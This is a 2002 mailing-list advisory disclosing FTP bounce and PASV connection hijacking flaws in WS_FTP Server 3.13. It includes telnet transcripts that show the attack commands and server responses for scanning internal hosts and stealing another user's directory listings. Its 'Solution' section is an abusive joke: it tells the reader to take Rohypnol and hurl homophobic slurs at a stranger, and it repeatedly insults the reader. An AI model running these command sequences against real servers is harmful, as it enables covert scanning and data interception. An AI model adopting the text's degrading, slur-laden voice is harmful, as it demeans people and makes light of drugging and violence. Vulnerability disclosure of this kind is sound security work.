[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20021025140531.65872.qmail@propane.zoomph.net>
From: dev-null at no-id.com (dev-null@...id.com)
Subject: IPSwitch, Inc. WS_FTP Server
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: IPSwitch, Inc. WS_FTP Server
Versions: v3.13 (dated 2002.08.07), possibly others.
Severity: Medium-Hot
Author: low halo <lowhalo@...hmail.com>
Date: October 25th, 2002
Revision: 1.0
{ Overview }
WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.
{ Impact }
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024. Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to. More information
on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html.
The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed. No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558.
{ Details }
This demonstrates the FTP bounce vulnerability. The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:
$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.
This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing
Next, from another IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
{ Solution }
1.) Mix yourself a Long Island Iced Tea.
2.) Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
box you bought last time to get yourself out of that chicken-
suit bind last Wednesday, remember??).
3.) While you're not looking, slip yourself two (2) crushed 100mg pills.
4.) Drink your Long Island while pretending to be flirting with someone
in a bar environment (but in fact, you're still in your lonely,
lonely apartment because you're a fucking looser and you're gonna
die alone 28 years from now).
5.) Put on those crotchless leather pants that you got in your closet.
But this time, don't wear anything underneath. Not even
underwear.
6.) Go to the local gay bar, even though you're not gay, and wait
outside 'till that warm fuzzy roofies feeling starts crawling up
your back.
7.) Go inside the bar and look for the menacing black biker guy named
Steve (Hey, how did you know his name is Steve if you're not
gay, huh??). Take the deepest breath you can and scream at the
top of your lungs every homosexual slur that you can think of
right in the guy's face.
8.) Wake up 16 hours later at the bottom of a ditch in a pool of your
own blood with that, "uh-oh, I think I forgot my jacket at the
bar" feeling.
9.) Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
when you do.
10.) Die alone 28 years from now, you fucking looser.
(Yeah, so anyways, IPSwitch never got back to me after two weeks, so
there is no solution to this problem.)
{ Conclusion }
A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.
And here's a quote I'd like all those iDEFENSE research contributors to
read:
"Few men have the virtue to withstand the highest bidder."
- George Washington
low halo <lowhalo@...hmail.com>
Defender of Truth and Liberty
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
58CE 3215 226A 69ED 4D20 4044 C925 54F9 9BFD 99BF
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)
iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb
8LkuAxTfsHywHMYA7SlCL8M=
=G5ln
-----END PGP SIGNATURE-----
--
This message has been sent via an anonymous mail relay at www.no-id.com.
Powered by blists - more mailing lists